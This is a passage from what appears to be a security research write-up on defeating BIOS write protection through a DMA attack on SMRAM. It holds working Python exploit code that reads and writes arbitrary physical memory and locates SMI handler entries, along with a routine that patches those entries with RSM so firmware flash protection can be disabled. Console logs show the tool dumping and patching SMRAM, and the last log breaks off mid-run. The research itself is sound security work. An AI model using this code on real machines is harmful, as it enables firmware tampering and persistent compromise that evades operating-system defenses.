        print '[+] Memory allocated at 0x%x' % self.buff.addr

        with open('/proc/self/pagemap', 'rb') as fd:

            # read physical address information
            fd.seek(self.buff.addr / PAGE_SIZE * 8)
            phys_info = struct.unpack('Q', fd.read(8))[0]

            # check that page is mapped and not swapped
            if phys_info & (1L << 63) == 0:

                raise Exception('Page is not present')

            if phys_info & (1L << 62) != 0:

                raise Exception('Page is swapped out')

            # get physical address from PFN (bits 0-54 of the pagemap entry)
            self.phys_addr = (phys_info & ((1L << 55) - 1)) * PAGE_SIZE

            print '[+] Physical address is 0x%x' % self.phys_addr

        # run SystemTap script in background thread
        self.worker = Worker(self.phys_addr, target_addr)
        self.worker.start()

    def close(self):

        self.worker.stop()

    # ...

DmaExpl class methods that read arbitrary physical memory with the DMA attack:
class DmaExpl(object):

    # ...

    def _dma_read(self, read_size):              

        count = self.worker.count

        print '[+] Reading physical memory 0x%x - 0x%x' % \
              (self.target_addr, self.target_addr + read_size - 1)        

        # O_DIRECT is needed to write our data to disk immediately
        fd = os.open(TEMP_PATH, os.O_CREAT | os.O_TRUNC | os.O_RDWR | os.O_DIRECT)

        # initiate DMA transaction
        if self.libc.write(fd, c_void_p(self.buff.addr), read_size) == -1:

            os.close(fd)
            raise Exception("write() fails")

        os.close(fd)

        while self.worker.count == count:

            # wait until the debug_dma_map_sg() call is intercepted
            time.sleep(0.1)

        with open(TEMP_PATH, 'rb') as fd:

            # get the data that was read
            data = fd.read(read_size)

        os.unlink(TEMP_PATH)

        self.target_addr += read_size

        return data

    def read(self, read_size):

        data = ''

        if read_size < PAGE_SIZE or read_size % PAGE_SIZE != 0:

            raise Exception('Invalid read size')

        while read_size > 0:

            #
            # We can read only MAX_IO_SIZE bytes of physical memory
            # with each os.write() call.
            #
            size = min(read_size, self.MAX_IO_SIZE)
            data += self._dma_read(size)

            read_size -= size

        print '[+] DONE'

        return data
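
The way read() splits a large request into separate I/O operations can be shown with a standalone sketch. It uses the same PAGE_SIZE and MAX_IO_SIZE constants as the class above and performs no actual I/O; the function name split_request is hypothetical. The sketch is written for Python 3.

```python
PAGE_SIZE = 0x1000
MAX_IO_SIZE = PAGE_SIZE * 0x1E

def split_request(target_addr, size):
    """Return a list of (first, last) physical addresses, one per I/O call."""
    if size < PAGE_SIZE or size % PAGE_SIZE != 0:
        raise ValueError('Invalid size')
    chunks = []
    while size > 0:
        # each call can cover at most MAX_IO_SIZE bytes
        chunk = min(size, MAX_IO_SIZE)
        chunks.append((target_addr, target_addr + chunk - 1))
        target_addr += chunk
        size -= chunk
    return chunks

if __name__ == '__main__':
    # 8 MB starting at 0xD7000000
    for first, last in split_request(0xD7000000, 0x800000)[:3]:
        print('0x%x - 0x%x' % (first, last))
```

For example, an 8 MB region is split into 69 requests: 68 of 0x1E000 bytes each and a final one of 0x8000 bytes.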

And similar methods that write arbitrary physical memory:
class DmaExpl(object):

    # ...

    def _dma_write(self, data):

        count = self.worker.count
        write_size = len(data)

        print '[+] Writing physical memory 0x%x - 0x%x' % \
              (self.target_addr, self.target_addr + write_size - 1)        

        with open(TEMP_PATH, 'wb') as fd:

            # save the data to be written into the temporary file
            fd.write(data)

        # O_DIRECT is needed to read our data directly from disk, bypassing the cache
        fd = os.open(TEMP_PATH, os.O_RDONLY | os.O_DIRECT)

        # initiate DMA transaction
        if self.libc.read(fd, c_void_p(self.buff.addr), write_size) == -1:

            os.close(fd)
            raise Exception("read() fails")

        os.close(fd)

        while self.worker.count == count:

            # wait until the debug_dma_map_sg() call is intercepted
            time.sleep(0.1)

        os.unlink(TEMP_PATH)

        self.target_addr += write_size

    def write(self, data):

        ptr = 0
        write_size = len(data)

        if write_size < PAGE_SIZE or write_size % PAGE_SIZE != 0:

            raise Exception('Invalid write size')        

        while ptr < write_size:

            #
            # We can write only MAX_IO_SIZE bytes of physical memory
            # with each os.read() call.
            #
            self._dma_write(data[ptr : ptr + self.MAX_IO_SIZE])
            ptr += self.MAX_IO_SIZE

        print '[+] DONE'

Example of DmaExpl usage: code that reads one page of physical memory starting at 0xD7000000:
# initialize exploit
expl = DmaExpl(0xD7000000)

# perform physical memory read
data = expl.read(0x1000)

# stop SystemTap script
expl.close()

Using this class I implemented a Python script called dma_expl.py. Here is an example of its usage on the Intel DQ77KB motherboard to dump the TSEG region of SMRAM into a file:
localhost ~ # python dma_expl.py --read 0xD7000000 --size 0x800000 --file TSEG.bin
[+] Memory allocated at 0x7ff0542ec000
[+] Physical address is 0x3fa15e000
Pass 1: parsed user script and 109 library script(s) using 62176virt/36376res/4216shr/32976data kb, in 160usr/0sys/171real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108880virt/84544res/5644shr/79680data kb, in 780usr/220sys/1120real ms.
Pass 3: translated to C into "/tmp/stapcorPM2/stap_c190a79e672287641579099c59eed383_7943_src.c" using 108880virt/84672res/5772shr/79680data kb, in 170usr/60sys/236real ms.
Pass 4: compiled C into "stap_c190a79e672287641579099c59eed383_7943.ko" in 3560usr/270sys/5209real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Reading physical memory 0xd7000000 - 0xd701dfff
[+] Reading physical memory 0xd701e000 - 0xd703bfff
[+] Reading physical memory 0xd703c000 - 0xd7059fff
[+] Reading physical memory 0xd705a000 - 0xd7077fff
[+] Reading physical memory 0xd7078000 - 0xd7095fff
[+] Reading physical memory 0xd7096000 - 0xd70b3fff
[+] Reading physical memory 0xd70b4000 - 0xd70d1fff
[+] Reading physical memory 0xd70d2000 - 0xd70effff
[+] Reading physical memory 0xd70f0000 - 0xd710dfff
[+] Reading physical memory 0xd710e000 - 0xd712bfff
[+] Reading physical memory 0xd712c000 - 0xd7149fff
[+] Reading physical memory 0xd714a000 - 0xd7167fff
[+] Reading physical memory 0xd7168000 - 0xd7185fff
[+] Reading physical memory 0xd7186000 - 0xd71a3fff
[+] Reading physical memory 0xd71a4000 - 0xd71c1fff
[+] Reading physical memory 0xd71c2000 - 0xd71dffff
[+] Reading physical memory 0xd71e0000 - 0xd71fdfff
[+] Reading physical memory 0xd71fe000 - 0xd721bfff
[+] Reading physical memory 0xd721c000 - 0xd7239fff
[+] Reading physical memory 0xd723a000 - 0xd7257fff
[+] Reading physical memory 0xd7258000 - 0xd7275fff
[+] Reading physical memory 0xd7276000 - 0xd7293fff
[+] Reading physical memory 0xd7294000 - 0xd72b1fff
[+] Reading physical memory 0xd72b2000 - 0xd72cffff
[+] Reading physical memory 0xd72d0000 - 0xd72edfff
[+] Reading physical memory 0xd72ee000 - 0xd730bfff
[+] Reading physical memory 0xd730c000 - 0xd7329fff
[+] Reading physical memory 0xd732a000 - 0xd7347fff
[+] Reading physical memory 0xd7348000 - 0xd7365fff
[+] Reading physical memory 0xd7366000 - 0xd7383fff
[+] Reading physical memory 0xd7384000 - 0xd73a1fff
[+] Reading physical memory 0xd73a2000 - 0xd73bffff
[+] Reading physical memory 0xd73c0000 - 0xd73ddfff
[+] Reading physical memory 0xd73de000 - 0xd73fbfff
[+] Reading physical memory 0xd73fc000 - 0xd7419fff
[+] Reading physical memory 0xd741a000 - 0xd7437fff
[+] Reading physical memory 0xd7438000 - 0xd7455fff
[+] Reading physical memory 0xd7456000 - 0xd7473fff
[+] Reading physical memory 0xd7474000 - 0xd7491fff
[+] Reading physical memory 0xd7492000 - 0xd74affff
[+] Reading physical memory 0xd74b0000 - 0xd74cdfff
[+] Reading physical memory 0xd74ce000 - 0xd74ebfff
[+] Reading physical memory 0xd74ec000 - 0xd7509fff
[+] Reading physical memory 0xd750a000 - 0xd7527fff
[+] Reading physical memory 0xd7528000 - 0xd7545fff
[+] Reading physical memory 0xd7546000 - 0xd7563fff
[+] Reading physical memory 0xd7564000 - 0xd7581fff
[+] Reading physical memory 0xd7582000 - 0xd759ffff
[+] Reading physical memory 0xd75a0000 - 0xd75bdfff
[+] Reading physical memory 0xd75be000 - 0xd75dbfff
[+] Reading physical memory 0xd75dc000 - 0xd75f9fff
[+] Reading physical memory 0xd75fa000 - 0xd7617fff
[+] Reading physical memory 0xd7618000 - 0xd7635fff
[+] Reading physical memory 0xd7636000 - 0xd7653fff
[+] Reading physical memory 0xd7654000 - 0xd7671fff
[+] Reading physical memory 0xd7672000 - 0xd768ffff
[+] Reading physical memory 0xd7690000 - 0xd76adfff
[+] Reading physical memory 0xd76ae000 - 0xd76cbfff
[+] Reading physical memory 0xd76cc000 - 0xd76e9fff
[+] Reading physical memory 0xd76ea000 - 0xd7707fff
[+] Reading physical memory 0xd7708000 - 0xd7725fff
[+] Reading physical memory 0xd7726000 - 0xd7743fff
[+] Reading physical memory 0xd7744000 - 0xd7761fff
[+] Reading physical memory 0xd7762000 - 0xd777ffff
[+] Reading physical memory 0xd7780000 - 0xd779dfff
[+] Reading physical memory 0xd779e000 - 0xd77bbfff
[+] Reading physical memory 0xd77bc000 - 0xd77d9fff
[+] Reading physical memory 0xd77da000 - 0xd77f7fff
[+] Reading physical memory 0xd77f8000 - 0xd77fffff
[+] DONE
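
The address ranges in this log follow a simple chunking pattern that can be reproduced with a short sketch. It is written for Python 3 (unlike the Python 2 listings in this article), the helper name split_io is made up for illustration, and the chunk size 0x1E000 is an assumption inferred from the log above rather than taken from the dma_expl.py source:

```python
def split_io(base, size, max_io=0x1E000):
    """Yield (first, last) physical address pairs, one per DMA transaction.

    max_io is an assumed value: it is the chunk size visible in the log,
    not a constant copied from dma_expl.py.
    """
    offset = 0
    while offset < size:
        chunk = min(max_io, size - offset)
        yield base + offset, base + offset + chunk - 1
        offset += chunk


ranges = list(split_io(0xD7000000, 0x800000))
for first, last in (ranges[0], ranges[-1]):
    print('0x%x - 0x%x' % (first, last))
print(len(ranges), 'transactions')
```

For the 8 MB TSEG region this gives 69 transactions, with a shorter final one that covers 0xd77f8000 - 0xd77fffff, which matches the number of "Reading physical memory" lines above.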

Mysterious SMI entries


Now that we are able to read and write SMRAM contents, we can patch its code to prevent the SMM code from resetting the BIOSWE bit.
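
For reference, the two BIOS_CNTL bits involved can be decoded from a raw register value with a few lines of Python 3. This is only a sketch: the bit positions (BIOSWE is bit 0, BLE is bit 1) follow the Intel PCH datasheets, the helper name decode_bios_cntl is made up for illustration, and 0x2a is the value that patch_smi_entry.py reports later in this article:

```python
BIOSWE = 1 << 0  # BIOS Write Enable
BLE = 1 << 1     # BIOS Lock Enable


def decode_bios_cntl(value):
    """Return the state of the two write protection bits discussed here."""
    return {'BIOSWE': bool(value & BIOSWE), 'BLE': bool(value & BLE)}


print(decode_bios_cntl(0x2A))
```

With 0x2a the BLE bit is set and BIOSWE is clear, which is the locked state that the SMM code keeps restoring.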

As you may know from Volume 3 (System Programming Guide) of the Intel® 64 and IA-32 Architectures Software Developer’s Manual, when the processor switches to System Management Mode it starts executing the SMI handler code located at the fixed offset 0x8000 from the beginning of SMRAM:


So, to successfully set the BIOSWE bit from the operating system, the only thing we need to do is patch the SMI handler code with an RSM instruction that exits from SMM back to the OS. On my test hardware I ran into something really weird while trying to do that: when I opened the TSEG region dump in a hex editor and checked offset 0x8000, I found that the data located there doesn’t look like valid executable code at all:
localhost ~ # hexdump -C --skip 0x8000 --length 0x100 TSEG.bin
00008000  00 10 00 00 00 00 00 00  00 00 0a 00 00 00 00 00  |................|
00008010  ee 03 00 00 00 00 00 00  b6 d7 15 77 34 b0 ff 97  |...........w4...|
00008020  83 46 8f 3f 79 14 d9 c5  99 94 82 dc ff e0 da bf  |.F.?y...........|
00008030  c3 5b 2d 31 28 93 71 06  54 7d 64 20 8c 9a a3 82  |.[-1(.q.T}d ....|
00008040  bf 6b a2 e0 6a 13 4b 99  3c a2 c3 58 0a 3a 7b 8f  |.k..j.K.<..X.:{.|
00008050  2d 24 cb 56 8e 4e b9 38  20 b3 4d 9c 4d 1a 58 8f  |-$.V.N.8 .M.M.X.|
00008060  ce a9 3a 51 f6 6c 05 57  7b 2f 60 13 5b 5d d3 b4  |..:Q.l.W{/`.[]..|
00008070  a5 05 0f 07 ec c5 88 d1  91 5e 95 0a 21 11 ee 5a  |.........^..!..Z|
00008080  8a 7f 0b a3 3b da f8 62  5c 56 e2 b7 4d 50 c2 e7  |....;..b\V..MP..|
00008090  1e a7 41 cd 1e 6c ea f9  de 36 a1 05 6e 08 d2 8b  |..A..l...6..n...|
000080a0  1b 90 e1 d4 cf 61 02 ff  6b c4 fb fe c3 74 84 f5  |.....a..k....t..|
000080b0  27 63 5d ac 90 dd 2d 01  d4 4a a4 39 6c 97 53 84  |'c]...-..J.9l.S.|
000080c0  87 6d 1c 33 e4 dd 8c cc  1c 40 d3 05 82 d6 3f a1  |.m.3.....@....?.|
000080d0  77 a2 ce 44 18 4f 72 b1  48 52 f9 ae 17 d2 75 fb  |w..D.Or.HR....u.|
000080e0  16 7f 54 d8 40 88 de 0b  89 7f 19 1a 67 c9 cd fe  |..T.@.......g...|
000080f0  45 3f 7f 98 54 89 d4 03  11 69 55 b1 c1 8c 1e 5c  |E?..T....iU....\|
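
One rough way to back up the "doesn't look like code" impression with a number is to measure the byte entropy of the region. The sketch below is Python 3, the helper names are made up for illustration, and the interpretation is only a heuristic: random, compressed or encrypted data tends to approach 8 bits per byte, while x86 code is typically noticeably lower.

```python
import math
from collections import Counter


def shannon_entropy(block):
    """Shannon entropy of a bytes object, in bits per byte (0.0 to 8.0)."""
    if not block:
        return 0.0
    total = len(block)
    counts = Counter(block)
    return -sum(n / total * math.log2(n / total) for n in counts.values())


def entropy_at(path, offset, length=0x1000):
    """Entropy of `length` bytes of the file at `path`, starting at `offset`."""
    with open(path, 'rb') as fd:
        fd.seek(offset)
        return shannon_entropy(fd.read(length))


# Sanity check on synthetic data: a uniform byte distribution gives 8 bits.
print(shannon_entropy(bytes(range(256))))
```

For the dump above the call would be entropy_at('TSEG.bin', 0x8000); no result is quoted here because I have not run it against that file.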

To investigate this, I downloaded the Board Support Package for Quark (a relatively modern SoC from Intel), which contains an open source implementation of UEFI compatible board firmware. Among other things, the Quark BSP also has some System Management Mode code. It’s pretty limited and doesn’t support x86_64 systems, but it can still tell us some useful information. This is how the SMI entry looks inside the Quark BSP source file IA32FamilyCpuBasePkg/PiSmmCpuDxeSmm/Ia32/SmiEntry.asm:
_SmiEntryPoint  PROC
    DB      0bbh                        ; mov bx, imm16
    DW      offset _GdtDesc - _SmiEntryPoint + 8000h
    DB      2eh, 0a1h                   ; mov ax, cs:[offset16]
    DW      DSC_OFFSET + DSC_GDTSIZ
    dec     eax
    mov     cs:[edi], eax               ; mov cs:[bx], ax
    DB      66h, 2eh, 0a1h              ; mov eax, cs:[offset16]
    DW      DSC_OFFSET + DSC_GDTPTR
    mov     cs:[edi + 2], ax            ; mov cs:[bx + 2], eax
    mov     bp, ax                      ; ebp = GDT base
    DB      66h
    lgdt    fword ptr cs:[edi]          ; lgdt fword ptr cs:[bx]
    DB      66h, 0b8h                   ; mov eax, imm32
gSmiCr3     DD      ?
    mov     cr3, eax
    DB      66h
    mov     eax, 020h                   ; as cr4.PGE is not set here, refresh cr3
    mov     cr4, eax                    ; in PreModifyMtrrs() to flush TLB.
    DB      2eh, 0a1h                   ; mov ax, cs:[offset16]
    DW      DSC_OFFSET + DSC_CS
    mov     cs:[edi - 2], eax           ; mov cs:[bx - 2], ax
    DB      66h, 0bfh                   ; mov edi, SMBASE
gSmbase    DD    ?
    DB      67h
    lea     ax, [edi + (@32bit - _SmiEntryPoint) + 8000h]
    mov     cs:[edi - 6], ax            ; mov cs:[bx - 6], eax
    mov     ebx, cr0
    DB      66h
    and     ebx, 9ffafff3h
    DB      66h
    or      ebx, 80000023h
    mov     cr0, ebx
    DB      66h, 0eah
    DD      ?
    DW      ?
_GdtDesc    FWORD   ?
@32bit:

    ;
    ; 32-bit SMI handler code goes here 
    ;

Execution of the SMI handler starts in a 16-bit environment similar to real mode. The code listed above performs basic initialization of the execution environment and jumps to 32-bit protected mode, where most of the SMM code actually runs.

Using this information I wrote a Python program that finds SMI entries inside my TSEG dump using a simple signature of their 16-bit code stub:
import sys, os, struct

#
# Extract SMI entries information from SMRAM dump.
#
def find_smi_entry(data):

    #
    # Standard SMI entry stub signature, None matches any byte
    #
    ret = []
    ptr = 0
    sig = [ '\xBB', None, '\x80',                   # mov     bx, 80XXh
            '\x66', '\x2E', '\xA1', None, '\xFB',   # mov     eax, cs:dword_FBXX
            '\x66', None, None,                     # mov     edx, eax
            '\x66', None, None ]                    # mov     ebp, eax

    # check for signature at each 100h offset of SMRAM
    while ptr + len(sig) <= len(data):

        found = True
        for i in range(len(sig)):

            if sig[i] is not None and sig[i] != data[ptr + i]:

                found = False
                break

        if found:

            print 'SMI entry found at 0x%x' % ptr
            ret.append(ptr)

        ptr += 0x100

    # list of SMI entry offsets from the beginning of the dump
    return ret

def main():   

    find_smi_entry(open(sys.argv[1], 'rb').read())
    return 0

if __name__ == '__main__':

    sys.exit(main())

This program successfully found four different occurrences of the handler code, which looks pretty sane: one dedicated SMI entry for each CPU core:
localhost ~ # python smi_entry.py TSEG.bin
SMI entry at 0x3f6800
SMI entry at 0x3f7000
SMI entry at 0x3f7800
SMI entry at 0x3f8000
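
The same wildcard scan can also be sketched for Python 3, where the dump is a bytes object and the signature can be compiled into a bytes regular expression. This is an illustrative port rather than the script from my repository; the name find_smi_entries and the synthetic test buffer are made up for the example:

```python
import re

# Same signature as in the listing above, None matches any byte.
SIG = [0xBB, None, 0x80,                # mov bx, 80XXh
       0x66, 0x2E, 0xA1, None, 0xFB,    # mov eax, cs:dword_FBXX
       0x66, None, None,                # mov edx, eax
       0x66, None, None]                # mov ebp, eax

# Each fixed byte is escaped, each wildcard becomes '.', DOTALL makes '.' match 0x0A too.
PATTERN = re.compile(
    b''.join(b'.' if b is None else re.escape(bytes([b])) for b in SIG),
    re.DOTALL)


def find_smi_entries(data, step=0x100):
    """Return offsets of SMI entry stubs, checking only `step`-aligned offsets."""
    return [ptr for ptr in range(0, len(data), step) if PATTERN.match(data, ptr)]


# Synthetic buffer with one aligned stub, for demonstration only.
stub = bytes([0xBB, 0x91, 0x80, 0x66, 0x2E, 0xA1, 0x48, 0xFB,
              0x66, 0x8B, 0xD0, 0x66, 0x8B, 0xE8])
demo = bytearray(0x300)
demo[0x100:0x100 + len(stub)] = stub
print([hex(ptr) for ptr in find_smi_entries(bytes(demo))])
```

Anchoring the match at fixed offsets with PATTERN.match(data, ptr) keeps the 100h alignment check of the original loop instead of searching the whole dump for the pattern.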

This is how the disassembled SMI entry looks on my Intel DQ77KB motherboard:
;
; 16-bit SMI entry stub that enables protected mode
;
mov     bx, 8091h           ; Get GDT descriptor address
mov     eax, cs:0FB48h      ; Get physical address of new GDT
mov     edx, eax
mov     ebp, eax
add     edx, 50h
mov     [eax+42h], dx       ; Initialize GDT entry
shr     edx, 10h
mov     [eax+44h], dl
mov     [eax+47h], dh
mov     ax, cs:0FB50h
dec     ax
mov     cs:[bx], ax          ; Set GDT limit
mov     eax, cs:0FB48h
mov     cs:[bx+2], eax       ; Set GDT physical address
db      66h
lgdt    fword ptr cs:[bx]    ; Switch to the new GDT
mov     eax, 0D73CB000h
mov     cr3, eax             ; Set page directory base
mov     eax, 668h
mov     cr4, eax             ; Enable PAE
mov     ax, cs:0FB14h       
mov     cs:[bx+48h], ax      ; Patch long mode jump with CS segment selector
mov     ax, 10h
mov     cs:[bx-2], ax        ; Patch protected mode jump with CS segment selector
mov     edi, cs:0FEF8h       
lea     eax, [edi+80DBh]     ; Get 64-bit stub address
mov     cs:[bx+44h], eax     ; Patch long mode jump with given address
lea     eax, [edi+8097h]     ; Get 32-bit stub address
mov     cs:[bx-6], eax       ; Patch protected mode jump with given address
mov     ecx, 0C0000080h      ; IA32_EFER MSR number
mov     ebx, 23h
mov     cr0, ebx             ; Enable protected mode
jmp     large far ptr 10h:0D73F6897h ; Jump to the protected mode code

;
; 32-bit SMI entry stub that enables long mode
;
mov     ax, 18h              
mov     ds, ax               ; Update protected mode segment registers
mov     es, ax
mov     ss, ax
mov     al, 1

loc_D73F68A3:

xchg    al, [ebp+8]
cmp     al, 0
jz      short loc_D73F68AE
pause
jmp     short loc_D73F68A3

loc_D73F68AE:

mov     eax, ebp
mov     edx, eax
mov     dl, 89h
mov     [eax+45h], dl
mov     eax, 40h
ltr     ax
mov     al, 0
xchg    al, [ebp+8]
rdmsr                        ; Read current IA32_EFER MSR value
or      ah, 1                ; Set long mode enabled flag
wrmsr                        ; Update IA32_EFER MSR value
mov     ebx, 80000023h
mov     cr0, ebx             ; Enable paging
db      67h
jmp     far ptr 38h:0D73F68DBh ; Jump to the long mode code

;
; 64-bit SMI entry stub that calls UEFI SMM foundation code
;
lea     ebx, [edi+0FB00h]
mov     ax, [rbx+16h]
mov     ds, ax               ; Update long mode segment registers
mov     ax, [rbx+1Ah]
mov     es, ax
mov     fs, ax
mov     gs, ax
mov     ax, [rbx+18h]
mov     ss, ax
mov     rsp, 0D73D4FF8h
mov     rcx, [rsp]
mov     rax, 0D70044E4h
sub     rsp, 208h
fxsave  qword ptr [rsp]      ; Save FPU registers
add     rsp, 0FFFFFFFFFFFFFFE0h
call    rax                  ; sub_D70044E4() that does SMI handling stuff
add     rsp, 20h
fxrstor qword ptr [rsp]      ; Restore FPU registers
rsm  
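
To make the control register constants in the listing above easier to read, here is a small Python 3 sketch that expands a CR0 or CR4 value into flag names. The bit names follow the Intel SDM; the tables are deliberately partial and the helper name decode is made up for illustration:

```python
# Partial bit name tables (Intel SDM, Volume 3); unknown bits are printed as bitN.
CR0_BITS = {0: 'PE', 1: 'MP', 2: 'EM', 3: 'TS', 4: 'ET', 5: 'NE',
            16: 'WP', 18: 'AM', 29: 'NW', 30: 'CD', 31: 'PG'}
CR4_BITS = {0: 'VME', 1: 'PVI', 2: 'TSD', 3: 'DE', 4: 'PSE', 5: 'PAE',
            6: 'MCE', 7: 'PGE', 8: 'PCE', 9: 'OSFXSR', 10: 'OSXMMEXCPT'}


def decode(value, names):
    """Return the names of all bits set in a 32-bit register value."""
    return [names.get(bit, 'bit%d' % bit)
            for bit in range(32) if (value >> bit) & 1]


print('cr0 = 23h       ', decode(0x23, CR0_BITS))
print('cr0 = 80000023h ', decode(0x80000023, CR0_BITS))
print('cr4 = 668h      ', decode(0x668, CR4_BITS))
```

The first CR0 write (23h) sets PE, MP and NE, so it only enables protected mode; the second one (80000023h) adds PG, which together with the LME bit set in IA32_EFER (the "or ah, 1" instruction sets bit 8 of EAX) activates long mode. The CR4 value 668h includes PAE, which long mode paging requires.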

Unfortunately, I haven’t figured out why exactly my motherboard firmware’s SMI entry is located at such a strange offset instead of 0x8000, as it should be according to all of the publicly available documentation. I assume it might be somehow related to Sandy Bridge, because my other test system with hardware of the same generation (Apple MacBook Pro 10,2) has the same weird SMI offsets. If you have any information that might shed some light on this question, please let me know :)
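
One observation that may bear on this question, offered as a hypothesis rather than an answer: the constants in the disassembly above are consistent with a relocated SMBASE. The Python 3 sketch below assumes that EDI holds SMBASE at the point of the two LEA instructions (as the "mov edi, SMBASE" line in the Quark listing suggests) and that TSEG starts at 0xD7000000; the function name is made up for illustration:

```python
TSEG_BASE = 0xD7000000

# Constants taken from the disassembly of the first SMI entry above.
JMP32_TARGET, STUB32_OFFSET = 0xD73F6897, 0x8097   # protected mode jump
JMP64_TARGET, STUB64_OFFSET = 0xD73F68DB, 0x80DB   # long mode jump


def smbase_from_stub():
    """Recover the value EDI must have had, assuming target = EDI + offset."""
    edi = JMP32_TARGET - STUB32_OFFSET
    # Both patched jumps must agree on the same base value.
    assert edi == JMP64_TARGET - STUB64_OFFSET
    return edi


smbase = smbase_from_stub()
entry = smbase + 0x8000
print('EDI (assumed SMBASE) = 0x%x' % smbase)
print('SMBASE + 0x8000      = 0x%x' % entry)
print('offset inside TSEG   = 0x%x' % (entry - TSEG_BASE))
```

Under these assumptions the entry point sits exactly 0x8000 bytes above the recovered base, and its offset inside TSEG is 0x3f6800, the first offset reported by smi_entry.py. The Intel SDM describes SMBASE relocation, so a per-core SMBASE spaced 0x800 apart would explain the four entries, but I have not verified that this is what the firmware actually does.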

SMI entry patching


Now that it’s clear how to find SMI entry addresses, we can implement code that uses the DMA attack to patch these entries with an RSM instruction, which lets us set the BIOSWE bit:
# RSM + NOP patch for SMI entry
SMI_ENTRY_PATCH = '\x0F\xAA\x90'

def patch_smi_entry(smram_addr, smram_size):

    ret = 0
    modified_pages = {}

    print '[+] Dumping SMRAM...'

    # initialize exploit
    expl = dma_expl.DmaExpl(smram_addr)

    try:

        # read all SMRAM contents
        data = expl.read(smram_size)    
        expl.close()

    except Exception, e:

        expl.close()
        raise

    print '[+] Patching SMI entries...'    

    # find SMI handlers offsets
    for ptr in find_smi_entry(data):

        page_offs = ptr & 0xFFF
        page_addr = ptr - page_offs

        # get data for single memory page
        if modified_pages.has_key(page_addr):

            page_data = modified_pages[page_addr]

        else:

            page_data = data[page_addr : page_addr + dma_expl.PAGE_SIZE]

        # patch first instruction of SMI entry
        page_data = page_data[: page_offs] + SMI_ENTRY_PATCH + \
                    page_data[page_offs + len(SMI_ENTRY_PATCH) :]

        modified_pages[page_addr] = page_data
        ret += 1

    for page_addr, page_data in modified_pages.items():

        # initialize exploit
        expl = dma_expl.DmaExpl(smram_addr + page_addr)

        try:

            # write modified page back to SMRAM
            expl.write(page_data)
            expl.close()            

        except Exception, e:

            expl.close()
            raise

    print '[+] DONE, %d SMI handlers patched' % ret

    return ret

I made a Python program called patch_smi_entry.py that accepts the SMRAM address and size as command line arguments, does all the work, and reports the BIOS write enable status.
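
The page bookkeeping of patch_smi_entry() can be exercised without touching any hardware. The following Python 3 sketch only builds the patched pages in memory from a dump and a list of entry offsets; the function name build_patched_pages is made up for illustration, and the offsets are the four reported by smi_entry.py above:

```python
PAGE_SIZE = 0x1000
RSM_NOP = b'\x0f\xaa\x90'  # RSM + NOP, same bytes as SMI_ENTRY_PATCH


def build_patched_pages(data, entry_offsets, patch=RSM_NOP):
    """Return {page offset: patched page bytes} for the given SMI entries."""
    pages = {}
    for ptr in entry_offsets:
        page_offs = ptr & (PAGE_SIZE - 1)
        page_addr = ptr - page_offs
        # Start from the original page the first time it is seen, so that
        # several entries in one page accumulate in the same copy.
        page = pages.setdefault(
            page_addr, bytearray(data[page_addr:page_addr + PAGE_SIZE]))
        page[page_offs:page_offs + len(patch)] = patch
    return {addr: bytes(page) for addr, page in pages.items()}


# Zero-filled stand-in for a real dump, large enough for the offsets below.
dump = bytes(0x3F9000)
pages = build_patched_pages(dump, [0x3F6800, 0x3F7000, 0x3F7800, 0x3F8000])
print([hex(addr) for addr in sorted(pages)])
```

Four entries spaced 0x800 apart fall into three 4 KB pages, which is why the log below shows only three write transactions.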

Check BIOS write protection with normally functioning SMM code:
localhost chipsec # python chipsec_util.py spi disable-wp

[CHIPSEC] Executing command 'spi' with args ['disable-wp']

[CHIPSEC] Trying to disable BIOS write protection..
[-] Couldn't disable BIOS region write protection in SPI flash
[CHIPSEC] (spi disable-wp) time elapsed 0.000

Patch SMI handlers to defeat SMM code:
localhost ~ # python patch_smi_entry.py 0xd7000000 0x800000
[+] BIOS_CNTL is 0x2a
[!] Can't set BIOSWE bit, BIOS write protection is enabled
[+] Dumping SMRAM...
[+] Memory allocated at 0x7f614ee2b000
[+] Physical address is 0xc973f000
Pass 1: parsed user script and 109 library script(s) using 62172virt/36372res/4212shr/32972data kb, in 170usr/10sys/315real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108876virt/84540res/5632shr/79676data kb, in 810usr/440sys/13062real ms.
Pass 3: translated to C into "/tmp/stapi26CgT/stap_06ba24e9748ef9297b5a524f191d9536_7942_src.c" using 108876virt/84684res/5776shr/79676data kb, in 190usr/50sys/251real ms.
Pass 4: compiled C into "stap_06ba24e9748ef9297b5a524f191d9536_7942.ko" in 3550usr/310sys/6154real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Reading physical memory 0xd7000000 - 0xd701dfff
[+] Reading physical memory 0xd701e000 - 0xd703bfff
[+] Reading physical memory 0xd703c000 - 0xd7059fff
[+] Reading physical memory 0xd705a000 - 0xd7077fff
[+] Reading physical memory 0xd7078000 - 0xd7095fff
[+] Reading physical memory 0xd7096000 - 0xd70b3fff
[+] Reading physical memory 0xd70b4000 - 0xd70d1fff
[+] Reading physical memory 0xd70d2000 - 0xd70effff
[+] Reading physical memory 0xd70f0000 - 0xd710dfff
[+] Reading physical memory 0xd710e000 - 0xd712bfff
[+] Reading physical memory 0xd712c000 - 0xd7149fff
[+] Reading physical memory 0xd714a000 - 0xd7167fff
[+] Reading physical memory 0xd7168000 - 0xd7185fff
[+] Reading physical memory 0xd7186000 - 0xd71a3fff
[+] Reading physical memory 0xd71a4000 - 0xd71c1fff
[+] Reading physical memory 0xd71c2000 - 0xd71dffff
[+] Reading physical memory 0xd71e0000 - 0xd71fdfff
[+] Reading physical memory 0xd71fe000 - 0xd721bfff
[+] Reading physical memory 0xd721c000 - 0xd7239fff
[+] Reading physical memory 0xd723a000 - 0xd7257fff
[+] Reading physical memory 0xd7258000 - 0xd7275fff
[+] Reading physical memory 0xd7276000 - 0xd7293fff
[+] Reading physical memory 0xd7294000 - 0xd72b1fff
[+] Reading physical memory 0xd72b2000 - 0xd72cffff
[+] Reading physical memory 0xd72d0000 - 0xd72edfff
[+] Reading physical memory 0xd72ee000 - 0xd730bfff
[+] Reading physical memory 0xd730c000 - 0xd7329fff
[+] Reading physical memory 0xd732a000 - 0xd7347fff
[+] Reading physical memory 0xd7348000 - 0xd7365fff
[+] Reading physical memory 0xd7366000 - 0xd7383fff
[+] Reading physical memory 0xd7384000 - 0xd73a1fff
[+] Reading physical memory 0xd73a2000 - 0xd73bffff
[+] Reading physical memory 0xd73c0000 - 0xd73ddfff
